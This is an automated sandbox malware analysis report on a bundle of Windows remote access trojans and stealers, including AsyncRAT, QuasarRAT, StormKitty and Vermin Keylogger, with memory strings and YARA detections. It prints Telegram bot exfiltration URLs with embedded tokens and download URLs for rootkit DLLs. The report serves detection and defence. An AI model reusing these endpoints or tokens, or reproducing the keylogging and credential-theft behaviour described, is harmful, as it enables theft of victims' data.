                            Source: update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/t
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.comd
                            Source: Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.000000000255B000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002504000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                            Source: Window Security.exe, 00000006.00000002.2843829214.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002504000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: http://ip-api.com/json/
                            Source: powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://payloads-poison.000webhostapp.com
                            Source: powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.000000000255B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                            Source: powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: crack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4466004136.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002504000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2245451019.00000000045B1000.00000004.00000800.00020000.00000000.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us-east-1.route-1.000webhost.awex.io
                            Source: powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.optnmstr.com/app/js/api.min.js
                            Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 00000011.00000002.2245451019.00000000045B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d
                            Source: update.exe, 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
                            Source: crack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                            Source: svchost.exe.0.dr, crack.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                            Source: svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.drString found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send
                            Source: svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096
                            Source: crack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=58817
                            Source: update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage
                            Source: update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=62917
                            Source: svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=62917
                            Source: svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.drString found in binary or memory: https://api.telegram.org/file/bot
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD
                            Source: update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgd
                            Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                            Source: update.exe, 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, update.exe.0.dr, svchost.exe.0.drString found in binary or memory: https://github.com/LimerBoy/StormKitty
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty0&eq
                            Source: update.exe, 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKittyTC
                            Source: powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000011.00000002.2181111799.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microP
                            Source: powershell.exe, 00000011.00000002.2181111799.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microPackageManagementp
                            Source: powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://payloads-poison.000webhostapp.com
                            Source: Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://payloads-poison.000webhostapp.com/r77-x64.dll
                            Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drString found in binary or memory: https://payloads-poison.000webhostapp.com/r77-x64.dllkhttps://payloads-poison.000webhostapp.com/r77-
                            Source: Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://payloads-poison.000webhostapp.com/r77-x86.dll
                            Source: svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
                            Source: places.raw.5.drString found in binary or memory: https://support.mozilla.org
                            Source: places.raw.5.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: places.raw.5.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.000webhost.com/cpanel-login?utm_source=000&utm_medium=no-such-website&utm_campaign=pages
                            Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.000webhost.com/free-website-sign-up?utm_source=000webhost&utm_medium=frontend&utm_campai
                            Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/000webhost-logo-coral-pink.svg
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-eating-a-cassette.svg
                            Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-make-a-website.svg
                            Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-upgrade-to-hostinger.svg
                            Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-with-shades.svg
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/favicon.ico
                            Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
                            Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hostinger.com/special/000webhost?utm_source=000webhost&utm_medium=frontend&utm_campaign=
                            Source: crack.exe, 00000002.00000000.2003529884.0000000000442000.00000002.00000001.01000000.00000006.sdmp, crack.exe, 00000002.00000002.2043779712.0000000002851000.00000004.00000800.00020000.00000000.sdmp, crack.exe.0.drString found in binary or memory: https://www.ifconfig.me/
                            Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org
                            Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                            Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, History.txt.5.dr, History.txt.4.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
                            Source: update.exe, 00000005.00000002.4546117851.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, tmpFF81.tmp.dat.4.dr, tmpFFC0.tmp.dat.5.dr, places.raw.5.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                            Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                            Source: update.exe, 00000005.00000002.4546117851.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, tmpFF81.tmp.dat.4.dr, tmpFFC0.tmp.dat.5.dr, places.raw.5.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                            Source: update.exe, 00000005.00000002.4546117851.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, tmpFF81.tmp.dat.4.dr, tmpFFC0.tmp.dat.5.dr, places.raw.5.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:49725 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:49726 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: Process Memory Space: Cracked.exe PID: 5524, type: MEMORYSTR
                            Contains functionality to capture screen (.Net source)
                            Source: svchost.exe.0.dr, DesktopScreenshot.cs.Net Code: Make
                            Source: update.exe.0.dr, .cs.Net Code:
                            Contains functionality to log keystrokes (.Net Source)
                            Source: Cracked.exe.0.dr, Keylogger.cs.Net Code: KeyboardLayout
                            Source: svchost.exe.0.dr, Keylogger.cs.Net Code: SetHook
                            Source: svchost.exe.0.dr, Keylogger.cs.Net Code: KeyboardLayout
                            Source: Windows Defender Service Host.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                            Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, Keylogger.cs.Net Code: KeyboardLayout
                            Installs a global keyboard hook
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWindow created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            barindex
                            Yara detected Vermin Keylogger
                            Source: Yara matchFile source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED

                            Spam, unwanted Advertisements and Ransom Demands

                            barindex
                            Modifies existing user documents (likely ransomware behavior)
                            Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GIGIYTFFYT.jpgJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.pngJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\PALRGUCVEH.xlsxJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL.docxJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL.xlsxJump to behavior

                            Operating System Destruction

                            barindex
                            Protects its processes via BreakOnTermination flag
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: 01 00 00 00 Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: 00 00 00 00 Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess information set: 01 00 00 00
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeProcess information set: 01 00 00 00

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 0.2.BTC.exe.2c80488.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.BTC.exe.2c75848.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 7.0.Windows Defender Service Host.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
